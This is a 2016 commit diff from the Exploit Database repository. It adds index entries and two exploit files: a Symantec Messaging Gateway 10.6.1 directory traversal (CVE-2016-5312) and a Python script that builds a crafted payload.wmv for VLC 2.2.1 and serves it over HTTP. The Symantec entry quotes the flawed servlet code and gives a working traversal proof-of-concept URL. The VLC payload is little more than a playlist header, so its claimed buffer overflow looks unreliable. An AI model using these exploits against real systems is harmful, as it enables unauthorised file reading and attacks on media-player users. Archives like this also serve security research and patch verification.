DB: 2016-09-29

2 new exploits

Symantec Messaging Gateway 10.6.1 - Directory Traversal

VLC Media Player 2.2.1 - Buffer Overflow
This commit is contained in:
Offensive Security 2016-09-29 05:01:16 +00:00
parent f421077feb
commit d86bdf5f80
3 changed files with 93 additions and 0 deletions

View file

@ -35268,6 +35268,7 @@ id,file,description,date,author,platform,type,port
38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0
38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0
38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0
40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0
38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
@ -36559,3 +36560,4 @@ id,file,description,date,author,platform,type,port
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0

Can't render this file because it is too large.

View file

@ -0,0 +1,53 @@
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
block6 : {
try {
String string = httpServletRequest.getParameter("sn");
//**** Taking parameter "sn" and writing it to the "string variable"
if (string == null) break block6;
String string2 = string.substring(string.length() - 3);
byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
//**** The string variable is passed here without any sanitanization for directory traversal
//**** and you can successfully use this to do a directory traversal.
if (arrby != null) {
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;
}
POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib

38
platforms/windows/dos/40439.py Executable file
View file

@ -0,0 +1,38 @@
Exploit Title: VLC Media Player 2.2.1 Buffer Overflow
2016-09-28
Author: sultan albalawi
Software Link: https://www.videolan.org/vlc/releases/2.2.1.html
Tested on:win7
video :https://www.facebook.com/pentest3/videos/vb.100012552940568/189735791454851/?type=2&theater&notif_t=video_processed&notif_id=1475012468070044
*************************************************************************************
filecreate = "payload.wmv" # create file (payload.wmv)
buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"+
"\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"+
"\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"+
"\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"+
"\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"+
"\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"+
"\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"+
"\x32\x30\x78\x33\x36\x30\r\n")
buffer += filecreate
open(filecreate, "wb").write(buffer)
print "create file done {}".format(filecreate)
import BaseHTTPServer
import sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
if sys.argv[1:]:
port = int(sys.argv[1])
else:
port =8080
server_address = ('192.168.100.3',8080)
HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
print sa[0],sa[1],filecreate
print "open vlc and open file {}".format(filecreate)
print "LISTENING..",sa[0],sa[1],filecreate
httpd.serve_forever()